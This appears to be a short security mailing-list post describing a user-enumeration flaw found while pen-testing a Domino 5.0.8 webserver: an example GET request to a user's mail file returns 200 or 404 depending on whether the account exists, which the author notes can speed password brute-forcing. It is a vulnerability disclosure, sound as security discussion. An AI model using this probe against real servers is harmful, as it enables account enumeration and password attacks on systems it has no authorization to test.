Enumerating users on a Domino webserver

[nicob () nicob net]

Hi,

during a pen-test against a Domino 5.0.8 webserver, I was able to enumerate valid users.

A simple "GET /mail/toto.nsf HTTP/1.0" redirects to the login page (with a "200 OK" 
HTTP code) if the user "toto" exists and a "404 File not Found"  is returned if the user 
doesn't exist.
This issue can allow a faster brute force attack on HTTP passwords.


I have search the Net for more information about this problem, but I found nothing.

Can the readers reproduce this behaviour ?
Do you see others implications than users enumeration (for social engineering and brute 
force attacks) ?


Nicob